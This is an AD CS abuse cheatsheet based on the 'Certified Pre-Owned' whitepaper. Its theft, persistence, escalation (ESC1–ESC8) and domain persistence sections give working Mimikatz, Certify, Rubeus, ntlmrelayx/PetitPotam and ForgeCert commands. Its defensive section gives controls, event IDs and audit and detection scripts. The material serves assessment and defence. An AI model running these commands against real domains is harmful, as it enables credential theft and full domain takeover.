AD CS "Certified Pre-Owned" Cheatsheet

Abusing Active Directory Certificate Services — Commands, Techniques & Defences
Based on the whitepaper by Will Schroeder & Lee Christensen (SpecterOps) · v1.0.1
THEFT1–5 PERSIST1–3 ESC1–8 DPERSIST1–3 PREVENT1–8 DETECT1–7

1. Background & Key Concepts

Active Directory Certificate Services (AD CS) is Microsoft's PKI implementation that integrates with Active Directory forests. It provides encryption, digital signatures, and — critically — user and machine authentication to AD. Although not installed by default, AD CS is widely deployed and is often misconfigured in ways that allow domain-level compromise.

Core Certificate Fields

Field | Description
Subject | Owner of the certificate (identity being certified).
SubjectAlternativeName (SAN) | One or more alternate names for the subject. Critically abused in ESC1/ESC6.
Extended Key Usages (EKUs) | OIDs that define what the certificate can be used for (e.g., authentication, code signing).
Issuer | The Certificate Authority (CA) that signed and issued the certificate.
NotBefore / NotAfter | Validity window of the certificate.
Basic Constraints | Indicates whether the certificate is a CA or end-entity certificate.
Signature | Signed by the issuing CA's private key to prove authenticity.

Key AD CS Containers (LDAP)

# All containers live under:
CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>

# Sub-containers:
CN=Certification Authorities   # Trusted root CA certs
CN=Enrollment Services         # Enterprise CA objects (pKIEnrollmentService)
CN=NTAuthCertificates          # CAs allowed to authenticate to AD
CN=AIA                         # Intermediate / cross CA certs
CN=Certificate Templates       # Template objects (pKICertificateTemplate)
The NTAuthCertificates object is the gatekeeper — only certificates issued by CAs listed here can authenticate to Active Directory. Adding a rogue CA here is the basis of DPERSIST2.

2. Authentication EKU OIDs

The following EKU OIDs, when present in a certificate, permit authentication to Active Directory. This is the core of most AD CS abuse scenarios.

Description | OID | Notes
Client Authentication | 1.3.6.1.5.5.7.3.2 | Most common auth EKU.
PKINIT Client Authentication | 1.3.6.1.5.2.3.4 | Must be added manually; not in default AD CS.
Smart Card Logon | 1.3.6.1.4.1.311.20.2.2 | Used for smart card / PKINIT auth.
Any Purpose | 2.5.29.37.0 | Allows any usage including auth.
No EKU (SubCA) | (none) | Subordinate CA cert; can authenticate.
Certificate Request Agent | 1.3.6.1.4.1.311.20.2.1 | Allows enrolling on behalf of others (ESC3).

Check EKUs on a Certificate (PowerShell)

$CertPath = "C:\path\to\cert.pfx"
$CertPass = "P@ssw0rd"
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($CertPath, $CertPass)
$Cert.EnhancedKeyUsageList

Check EKUs with certutil

certutil.exe -dump -v cert.pfx

3. Certificate Enrollment Methods

Clients can request certificates from an Enterprise CA via several interfaces. Each interface represents a potential attack surface.

Method | Protocol | URL / Interface
DCOM (default) | MS-WCCE | COM interfaces on the CA server
RPC / Named Pipes | MS-ICPR | Named pipes or TCP/IP
Web Enrollment | HTTP/HTTPS | http://<CA>/certsrv/
Certificate Enrollment Web Service (CES) | MS-WSTEP (SOAP) | https://<CES>/<CA>_CES_Kerberos/service.svc
Network Device Enrollment (NDES) | SCEP | http://<NDES>/CertSrv/mscep/

GUI Enrollment

# User certificates
certmgr.msc → Personal → Certificates → All Tasks → Request New Certificate
# Machine certificates
certlm.msc → Personal → Certificates → All Tasks → Request New Certificate

Command-Line Enrollment

# Using certreq.exe
certreq.exe -submit -config "CA-SERVER\CA-NAME" request.inf cert.cer
# Using PowerShell
Get-Certificate -Template "User" -CertStoreLocation Cert:\CurrentUser\My

Convert PEM to PFX (OpenSSL)

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

4. AD CS Enumeration

Thorough enumeration of CAs and certificate templates is the foundation of any AD CS assessment. The primary tools are Certify, certutil, and PSPKIAudit.

Enumerate Certificate Authorities

# Certify — list Enterprise CAs and published templates
Certify.exe cas
# certutil — list CAs
certutil.exe -TCAInfo
# PSPKIAudit (PowerShell)
Import-Module PSPKIAudit
Invoke-PKIAudit

Enumerate Certificate Templates

# Certify — all published templates with permissions
Certify.exe find
# Certify — only templates enrollable for client auth
Certify.exe find /clientauth
# Certify — templates likely vulnerable to domain escalation
Certify.exe find /vulnerable
# certutil — detailed template info
certutil.exe -v -dstemplate

LDAP Query for ESC1-Vulnerable Templates

# Finds templates with no approval, auth EKU, and CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
# (1.2.840.113556.1.4.804 is the LDAP bitwise-OR matching rule used to test flag bits)
(&(objectclass=pkicertificatetemplate)
  (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))
  (|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))
  (|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)
    (pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)
    (pkiextendedkeyusage=1.3.6.1.5.2.3.4)
    (pkiextendedkeyusage=2.5.29.37.0)
    (!(pkiextendedkeyusage=*)))
  (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))
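The same conditions expressed as an audit routine, as an added example (not Certify's or the whitepaper's code): template records are constructed dicts keyed by the LDAP attribute names, enrollment principals sit in a constructed enroll field because the filter itself does not read ACLs, and the routine also covers the ESC2 Any Purpose / no-EKU case from section 7.

```python
# Bit values of the msPKI flag attributes the filter tests
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval

# EKU OIDs that permit authentication to AD (section 2)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
ANY_PURPOSE = "2.5.29.37.0"
# Assumed (constructed) list of principals whose enrollment right counts as low-privileged
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "domain computers", "everyone"}


def permits_auth(ekus):
    """No EKU at all (SubCA style) or any auth EKU permits AD authentication."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_conditions(tpl):
    """Map each ESC1 condition to whether the template record meets it."""
    enrollers = {p.split("\\")[-1].lower() for p in tpl.get("enroll", [])}
    return {
        "low_priv_enroll": bool(LOW_PRIV_PRINCIPALS & enrollers),
        "no_manager_approval": not tpl.get("mspki-enrollment-flag", 0) & CT_FLAG_PEND_ALL_REQUESTS,
        "no_ra_signature": tpl.get("mspki-ra-signature", 0) == 0,
        "auth_eku": permits_auth(tpl.get("pkiextendedkeyusage", [])),
        "enrollee_supplies_subject": bool(
            tpl.get("mspki-certificate-name-flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    }


def is_esc1(tpl):
    return all(esc1_conditions(tpl).values())


def is_esc2(tpl):
    """ESC2: low-priv enrollment, no approval or signature, and Any Purpose or no EKU."""
    c = esc1_conditions(tpl)
    ekus = tpl.get("pkiextendedkeyusage", [])
    return (c["low_priv_enroll"] and c["no_manager_approval"] and c["no_ra_signature"]
            and (not ekus or ANY_PURPOSE in ekus))


def audit(templates):
    """Return {template cn: [finding, ...]} for templates with at least one finding."""
    findings = {}
    for tpl in templates:
        hits = [tag for tag, ok in (("ESC1", is_esc1(tpl)), ("ESC2", is_esc2(tpl))) if ok]
        if hits:
            findings[tpl["cn"]] = hits
    return findings


# Constructed template records; flag values are illustrative, not dumped from a real CA
SAMPLE_TEMPLATES = [
    {"cn": "VulnTemplate", "enroll": ["CORP\\Domain Users"], "mspki-enrollment-flag": 0,
     "mspki-ra-signature": 0, "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
     "mspki-certificate-name-flag": 0x1},
    {"cn": "User", "enroll": ["CORP\\Domain Users"], "mspki-enrollment-flag": 0x29,
     "mspki-ra-signature": 0, "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
     "mspki-certificate-name-flag": 0xA6000000},   # subject built from AD, not supplied
    {"cn": "ApprovedWeb", "enroll": ["CORP\\Domain Users"], "mspki-enrollment-flag": 0x2,
     "mspki-ra-signature": 0, "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"],
     "mspki-certificate-name-flag": 0x1},          # supply-in-request, but approval gates it
    {"cn": "AnyPurposeTemplate", "enroll": ["CORP\\Domain Users"], "mspki-enrollment-flag": 0,
     "mspki-ra-signature": 0, "pkiextendedkeyusage": ["2.5.29.37.0"],
     "mspki-certificate-name-flag": 0},
    {"cn": "AdminOnly", "enroll": ["CORP\\Domain Admins"], "mspki-enrollment-flag": 0,
     "mspki-ra-signature": 0, "pkiextendedkeyusage": [], "mspki-certificate-name-flag": 0x1},
]

if __name__ == "__main__":
    for name, hits in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(hits)}")
```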

View CA Security Descriptor (Remote Registry)

# Registry path on CA server
HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA NAME>\Security
# Read remotely with reg.exe
reg.exe query \\<CA-SERVER>\HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA NAME>

5. Certificate Theft

THEFT1 Export via Crypto APIs

If a private key is marked exportable, it can be extracted directly. For non-exportable keys, Mimikatz can patch CAPI/CNG in memory to force exportability.

# PowerShell — export exportable cert
$cert = Get-Item Cert:\CurrentUser\My\<thumbprint>
Export-PfxCertificate -Cert $cert -FilePath C:\out\cert.pfx -Password (ConvertTo-SecureString "pass" -AsPlainText -Force)
# Mimikatz — patch CAPI (current process)
crypto::capi
# Mimikatz — patch CNG (patches lsass.exe)
crypto::cng
# Mimikatz — export all machine certs after patching
crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT2 User Certificate Theft via DPAPI

User private keys are stored DPAPI-encrypted under %APPDATA%\Microsoft\Crypto\RSA\<User SID>\. Decryption requires the user's DPAPI master key.

# SharpDPAPI — decrypt using domain backup key
SharpDPAPI.exe certificates /pvk:<domain_backup_key.pvk>
# SharpDPAPI — decrypt using known password
SharpDPAPI.exe certificates /password:<user_password>
# SharpDPAPI — decrypt using explicit masterkey file
SharpDPAPI.exe certificates /mkfile:<path_to_masterkey> /password:<password>
# Mimikatz — retrieve masterkey via RPC
dpapi::masterkey /in:"C:\PATH\TO\MASTERKEY" /rpc
# Mimikatz — decrypt masterkey with password
dpapi::masterkey /in:"C:\PATH\TO\MASTERKEY" /sid:<account_sid> /password:<password>
# Convert resulting PEM to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

THEFT3 Machine Certificate Theft via DPAPI

Machine private keys are stored under %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys\. The DPAPI_SYSTEM LSA secret (accessible only as SYSTEM) is required for decryption.

# SharpDPAPI — auto-elevate to SYSTEM and dump machine certs
SharpDPAPI.exe certificates /machine
# Mimikatz — dump DPAPI_SYSTEM LSA secret
lsadump::secrets
# Mimikatz — export machine certs after patching CNG
crypto::cng
crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT4 Finding Certificate Files on Disk

Certificates are sometimes left on file systems, shares, or source code repositories. Common file extensions to search for are listed below.

Extension | Contents
.pfx / .p12 | Certificate + private key (PKCS#12). Usually password-protected.
.pem | Base64-encoded certificate and/or private key.
.key | Private key only.
.crt / .cer | Certificate only (no private key).
.jks / .keystore | Java Keystore — may contain certs and private keys.
.csr | Certificate Signing Request — no cert or key.

# PowerShell — recursive search
Get-ChildItem -Path C:\ -Recurse -Include *.pfx,*.p12,*.pem,*.key,*.crt,*.cer -ErrorAction SilentlyContinue
# Seatbelt — search C:\ up to 10 levels deep
Seatbelt.exe dir C:\ 10 "\.(pfx|pem|p12)$" false
# Crack a password-protected PFX with JohnTheRipper
pfx2john.py cert.pfx > cert.hash
john cert.hash --wordlist=rockyou.txt

THEFT5 NTLM Credential Theft via PKINIT

When a TGT is obtained via PKINIT (certificate-based Kerberos), the KDC embeds the account's NTLM hash in the PAC. This hash can be extracted and used for pass-the-hash or cracking.

# Kekeo — extract NTLM hash from a PKINIT TGT
tgt::pac /in:<path_to_tgt.kirbi>
# Rubeus — request TGT with certificate and extract NTLM
Rubeus.exe asktgt /user:<user> /certificate:<base64_cert> /getcredentials

6. Account Persistence

PERSIST1 User Account Persistence via Certificate Request

Request a certificate for the current user from a template that allows domain authentication. The certificate remains valid (and usable for authentication) even after a password reset.

# Step 1 — Find enrollable templates with client auth EKU
Certify.exe find /clientauth
# Step 2 — Request a certificate
Certify.exe request /ca:CA-SERVER\CA-NAME /template:User
# Step 3 — Convert PEM output to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Step 4 — Use certificate to request a TGT with Rubeus
Rubeus.exe asktgt /user:<username> /certificate:cert.pfx /password:<pfx_password> /ptt

PERSIST2 Machine Account Persistence via Certificate Request

Enroll the machine account in a certificate template that allows Domain Computers. Persistence survives system reimages (if the machine account name is reused) and password rotations.

# Certify — enroll as machine account (auto-elevates to SYSTEM)
Certify.exe request /ca:CA-SERVER\CA-NAME /template:Machine /machine
# Rubeus — request TGT for machine account
Rubeus.exe asktgt /user:<MACHINE$> /certificate:cert.pfx /password:<pfx_password> /ptt

PERSIST3 Account Persistence via Certificate Renewal

Renew a certificate before it expires to silently extend access without requesting a new certificate (which would leave additional artifacts on the CA).

# certreq.exe — renew a user certificate
certreq.exe -renew -cert <thumbprint> renewed.cer
# certreq.exe — renew a machine certificate
certreq.exe -renew -machine -cert <thumbprint> renewed.cer

7. Domain Escalation

ESC1 Misconfigured Template — Enrollee Supplies Subject

A template is vulnerable when: low-privileged users can enroll, no manager approval is required, an auth EKU is present, and the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set. This allows any enrollee to specify an arbitrary SAN (e.g., a Domain Admin UPN).

# Find vulnerable templates
Certify.exe find /vulnerable
# Exploit — request cert as Domain Admin
Certify.exe request /ca:CA-SERVER\CA-NAME /template:VulnTemplate /altname:Administrator@corp.local
# Convert and use
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx
Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /password:<pfx_password> /ptt

ESC2 Misconfigured Template — Any Purpose / No EKU

A template is vulnerable when it has the Any Purpose EKU or no EKU (SubCA) and grants low-privileged enrollment rights. Even without CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, these certs can authenticate to AD as the requesting user, and can be used as a Certificate Request Agent (see ESC3).

# Enumerate — Any Purpose or no-EKU templates
Certify.exe find /vulnerable
# Enroll and authenticate as self
Certify.exe request /ca:CA-SERVER\CA-NAME /template:AnyPurposeTemplate

ESC3 Misconfigured Enrollment Agent Template

A template with the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1) and no enrollment agent restrictions allows a low-privileged user to request certificates on behalf of any other user.

# Step 1 — Obtain a Certificate Request Agent certificate
Certify.exe request /ca:CA-SERVER\CA-NAME /template:EnrollmentAgentTemplate
# Step 2 — Use agent cert to enroll on behalf of a Domain Admin
Certify.exe request /ca:CA-SERVER\CA-NAME /template:User /onbehalfof:corp\Administrator /enrollcert:agent.pfx /enrollcertpw:<password>

ESC4 Vulnerable Certificate Template Access Control

If a low-privileged user has WriteDACL, WriteOwner, or WriteProperty rights on a template object, they can reconfigure it to be vulnerable (e.g., add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or a dangerous EKU).

# Check template ACLs with Certify
Certify.exe find
# Modify template with PowerView (add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
Set-DomainObject -Identity "VulnTemplate" -Set @{'mspki-certificate-name-flag'=1} -Verbose

ESC5 Vulnerable PKI AD Object Access Control

Write access to other AD CS-related objects (e.g., the Enterprise CA object, the NTAuthCertificates object, or the PKI container itself) can allow an attacker to compromise the entire PKI.

# Enumerate ACLs on PKI objects with PowerView
Get-DomainObjectAcl -SearchBase "CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -ResolveGUIDs

ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag on CA

When this flag is set on a CA, any certificate request can include a user-specified SAN, regardless of template settings. Combined with any enrollable auth template, this allows domain escalation.

# Check if flag is set
certutil.exe -config "CA-SERVER\CA-NAME" -getreg "policy\EditFlags"
# Exploit — request cert with arbitrary SAN
Certify.exe request /ca:CA-SERVER\CA-NAME /template:User /altname:Administrator@corp.local
# Remediation — disable the flag (restart the CertSvc service afterwards for the change to take effect)
certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

ESC7 Vulnerable Certificate Authority Access Control

Principals with Manage CA rights can change CA settings (e.g., enable ESC6). Principals with Issue and Manage Certificates rights can approve pending certificate requests, bypassing manager approval requirements.

# Enumerate CA permissions
Certify.exe cas
# Approve a pending certificate request (requires Issue and Manage Certificates)
Certify.exe approve /ca:CA-SERVER\CA-NAME /request:<request_id>
# Enable EDITF_ATTRIBUTESUBJECTALTNAME2 (requires Manage CA)
certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2

ESC8 NTLM Relay to AD CS HTTP Endpoints

If the AD CS web enrollment endpoint (/certsrv/) is accessible and does not require HTTPS or EPA, an attacker can relay NTLM authentication from a privileged account (e.g., a DC) to obtain a certificate for that account.

# Start relay targeting AD CS web enrollment
impacket-ntlmrelayx -t http://<adcs-server>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Trigger NTLM auth from a DC (e.g., via printerbug / petitpotam)
python3 PetitPotam.py -u <user> -p <pass> <attacker_ip> <dc_ip>
# Use the obtained base64 certificate with Rubeus
Rubeus.exe asktgt /user:<DC$> /certificate:<base64_cert> /ptt

8. Domain Persistence

DPERSIST1 Certificate Forgery with Stolen CA Private Key

If a CA's private key is not hardware-protected, it can be extracted via DPAPI. The stolen key can then be used with ForgeCert to forge certificates for any principal in the domain. Forged certificates cannot be revoked as long as the CA certificate is valid.

# Step 1 — Extract CA private key with SharpDPAPI (run as SYSTEM on CA)
SharpDPAPI.exe certificates /machine
# Step 1 (alt) — Extract with Mimikatz
crypto::cng
crypto::certificates /export /systemstore:LOCAL_MACHINE
# Step 2 — Forge a certificate for any user
ForgeCert.exe /CA:ca.pfx /CAPassword:<password> /Subject:"CN=Administrator" /SubjectAltName:Administrator@corp.local /Template:User /NewCertPassword:<new_password> /OutFile:forged.pfx
# Step 3 — Use forged cert to get a TGT
Rubeus.exe asktgt /user:Administrator /certificate:forged.pfx /password:<new_password> /ptt

DPERSIST2 Trusting Rogue CA Certificates

An attacker with sufficient privileges can add a rogue CA certificate to the NTAuthCertificates AD object and the enterprise trust stores, allowing them to issue certificates that AD will trust for authentication.

# Add rogue CA to NTAuth store
certutil.exe -dspublish -f rogue_ca.cer NTAuthCA
# Add rogue CA to root CA store
certutil.exe -dspublish -f rogue_ca.cer RootCA
# Verify with Certify
Certify.exe cas

DPERSIST3 Malicious Misconfigurations for Future Escalation

An attacker with CA or template write access can introduce misconfigurations (e.g., enable EDITF_ATTRIBUTESUBJECTALTNAME2, weaken template ACLs) that can be exploited later, even after losing initial access.

# Enable EDITF_ATTRIBUTESUBJECTALTNAME2 for future ESC6 abuse
certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
# Grant a controlled user WriteDACL on a template (PowerView)
Add-DomainObjectAcl -TargetIdentity "VulnTemplate" -PrincipalIdentity "backdoor_user" -Rights WriteDacl

9. Defensive Guidance

Preventive Controls

ID | Control | Key Action / Command
PREVENT1 | Treat CAs as Tier 0 Assets | Apply DC-level security controls to all CA servers and subordinate CAs.
PREVENT2 | Harden CA Settings | certutil -config "CA\NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2; restrict "Manage CA" and "Issue and Manage Certificates" rights.
PREVENT3 | Audit Published Templates | Remove unused templates from all CAs. Use Certify.exe find or certutil -TCAInfo.
PREVENT4 | Harden Template Settings | Disable "Supply in the request"; enable manager approval; restrict enrollment to least-privilege groups; minimise EKUs.
PREVENT5 | Audit NTAuthCertificates | certutil -viewdelstore "ldap:///CN=NtAuthCertificates..."; remove unnecessary CA certs.
PREVENT6 | Secure Private Key Storage | Use HSMs for CA keys; enable TPM attestation for client keys; enable Credential Guard.
PREVENT7 | Enforce Strict User Mappings | Set HKLM\SYSTEM\CurrentControlSet\Services\Kdc\UseSubjectAltName = 0 on DCs to disable SAN-based mapping.
PREVENT8 | Harden HTTP Enrollment Endpoints | Require HTTPS + EPA on /certsrv/; disable if not needed; restrict access to authorised hosts.

Disable SAN Mapping (PREVENT7)

# On each Domain Controller — disable SAN-based Kerberos mapping
reg add HKLM\SYSTEM\CurrentControlSet\Services\Kdc /v UseSubjectAltName /t REG_DWORD /d 0 /f
# On each Domain Controller — disable SAN-based SChannel mapping
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel /v CertificateMappingMethods /t REG_DWORD /d 0x1F /f

Audit NTAuthCertificates (PREVENT5)

# View certificates in NTAuth store
certutil -viewstore "ldap:///CN=NtAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local?cACertificate?base?objectclass=certificationAuthority"
# Remove a certificate by thumbprint (PSPKI PowerShell module)
Install-Module PSPKI -Scope CurrentUser
Import-Module PSPKI
Get-AdPkiContainer -ContainerType NTAuth | Remove-AdCertificate -Thumbprint "EC9385E533782453D5C285B2A67311447FB57A6F" -Dispose

Detective Controls — Windows Event IDs

Event ID | Description | Relevant Technique
4886 | Certificate Services received a certificate request. | PERSIST1, PERSIST2, ESC1–ESC8
4887 | Certificate Services approved a certificate request and issued a certificate. | PERSIST1, PERSIST2, ESC1–ESC8
4888 | Certificate Services denied a certificate request. | PERSIST1, PERSIST2
4870 | Certificate Services revoked a certificate. | Incident Response
4882 | The security permissions for Certificate Services were changed. | ESC4, ESC5, ESC7
4898 | Certificate Services loaded a template. | ESC4, DPERSIST3
4768 | A Kerberos authentication ticket (TGT) was requested. | THEFT5, PERSIST1, ESC1
4769 | A Kerberos service ticket was requested. | PERSIST2 (S4U2Self)
4776 | The computer attempted to validate the credentials for an account. | THEFT5 (NTLM from PKINIT)
5136 | A directory service object was modified. | ESC4, ESC5, DPERSIST2, DPERSIST3

Detective Controls Summary

ID | Control | What to Monitor
DETECT1 | Monitor Certificate Enrollments | Event IDs 4886, 4887 on CA servers; alert on unusual template usage or high-volume requests.
DETECT2 | Monitor Certificate Authentication | Event ID 4768 with Pre-Authentication Type: 16 (PKINIT); alert on cert auth for sensitive accounts.
DETECT3 | Monitor CA Backup Events | Event IDs 4876, 4877 on CA servers; unexpected backups may indicate key theft attempts.
DETECT4 | Monitor Template Modifications | Event ID 4898 (template loaded) and 5136 (AD object modified) for certificate template objects.
DETECT5 | Monitor DPAPI Key Reads | Audit access to %APPDATA%\Microsoft\Crypto\ and %ALLUSERSPROFILE%\...\MachineKeys\.
DETECT6 | Use Honey Credentials | Deploy honey certificates with auth EKUs; alert on any authentication attempt using them.
DETECT7 | Miscellaneous | Monitor for certutil.exe invocations with -dspublish, -setreg, or -backup flags.
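A triage routine for the DETECT1, DETECT2 and DETECT7 indicators in the two tables above, as an added example (not from the whitepaper or any tool listed here): the events are constructed dicts whose keys follow the field names of the 4768 and 4886/4887 event messages, the watch list and volume threshold are assumptions, and the san:upn= check looks for the ESC6 footprint where a SAN is passed as a request attribute rather than inside the CSR.

```python
import re
from collections import Counter

# Constructed watch list and threshold; tune both to the environment
SENSITIVE_ACCOUNTS = {"administrator", "krbtgt", "dc01$"}
PREAUTH_PKINIT = 16           # 4768 Pre-Authentication Type 16 = PKINIT (PA-PK-AS-REQ)
REQUEST_VOLUME_THRESHOLD = 5  # 4886 requests from one requester within the analysed window
CERTUTIL_FLAGS = ("-dspublish", "-setreg", "-backup")


def pkinit_for_sensitive_accounts(events):
    """DETECT2: 4768 TGT requests that used PKINIT for a watch-listed account."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768
            and e.get("PreAuthType") == PREAUTH_PKINIT
            and e["TargetUserName"].lower() in SENSITIVE_ACCOUNTS]


def san_attribute_mismatches(events):
    """DETECT1 (ESC6 footprint): 4887 issuances whose request attributes carry a
    san:upn= value naming a principal other than the requester."""
    hits = []
    for e in events:
        if e["EventID"] != 4887:
            continue
        m = re.search(r"san:upn=([^\s,;]+)", e.get("Attributes", ""), re.IGNORECASE)
        if not m:
            continue
        requester = e["Requester"].split("\\")[-1].lower()
        target = m.group(1).split("@")[0].lower()
        if requester != target:
            hits.append((e["RequestID"], requester, target))
    return hits


def high_volume_requesters(events, threshold=REQUEST_VOLUME_THRESHOLD):
    """DETECT1: requesters generating an unusual number of 4886 requests."""
    counts = Counter(e["Requester"] for e in events if e["EventID"] == 4886)
    return {requester: n for requester, n in counts.items() if n >= threshold}


def suspicious_certutil(commandlines):
    """DETECT7: certutil invocations using the publish / config / backup switches."""
    return [cmd for cmd in commandlines
            if "certutil" in cmd.lower()
            and any(flag in cmd.lower() for flag in CERTUTIL_FLAGS)]


# Constructed sample events (not real event log exports)
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": 16},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": 2},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": 16},
    {"EventID": 4887, "RequestID": 1042, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User\nsan:upn=Administrator@corp.local"},
    {"EventID": 4887, "RequestID": 1043, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User"},
] + [{"EventID": 4886, "RequestID": 2000 + i, "Requester": "CORP\\svc-scan", "Attributes": ""}
     for i in range(6)]

# Constructed process command lines as a host-based sensor might record them
SAMPLE_CMDLINES = [
    'certutil.exe -dspublish -f rogue_ca.cer NTAuthCA',
    'certutil -config "CA-SERVER\\CA-NAME" -setreg policy\\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2',
    'certutil.exe -dump -v cert.pfx',
]

if __name__ == "__main__":
    print("PKINIT for sensitive accounts:", pkinit_for_sensitive_accounts(SAMPLE_EVENTS))
    print("SAN attribute mismatches:", san_attribute_mismatches(SAMPLE_EVENTS))
    print("High-volume requesters:", high_volume_requesters(SAMPLE_EVENTS))
    print("Suspicious certutil:", suspicious_certutil(SAMPLE_CMDLINES))
```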

10. Tool Reference

Tool | Purpose | Key Commands
Certify | AD CS enumeration and certificate requests (C#, GhostPack) | cas, find, find /vulnerable, request, approve
Rubeus | Kerberos abuse toolkit; supports PKINIT certificate auth (C#, GhostPack) | asktgt /certificate:..., s4u, describe
SharpDPAPI | DPAPI decryption; extracts user and machine certificates (C#, GhostPack) | certificates, certificates /machine, masterkeys
ForgeCert | Forge certificates using a stolen CA private key (C#, GhostPack) | /CA:ca.pfx /SubjectAltName:user@domain /OutFile:forged.pfx
Mimikatz | Credential extraction; CAPI/CNG patching; DPAPI operations | crypto::capi, crypto::cng, crypto::certificates, dpapi::masterkey
Kekeo | Kerberos manipulation; PKINIT to NTLM hash extraction | tgt::pac, tgt::ask
PSPKIAudit | PowerShell AD CS auditing tool (GhostPack) | Invoke-PKIAudit
certutil.exe | Built-in Windows CA management and certificate utility | -TCAInfo, -v -dstemplate, -dump -v cert.pfx, -setreg, -backup
certreq.exe | Built-in Windows certificate request tool | -submit, -renew, -retrieve
Seatbelt | Host enumeration and triage (C#, GhostPack) | dir, FindInterestingFiles
impacket-ntlmrelayx | NTLM relay attacks; supports AD CS web enrollment relay (ESC8) | -t http://<adcs>/certsrv/certfnsh.asp --adcs
openssl | Certificate format conversion (PEM ↔ PFX) | pkcs12 -in cert.pem -export -out cert.pfx
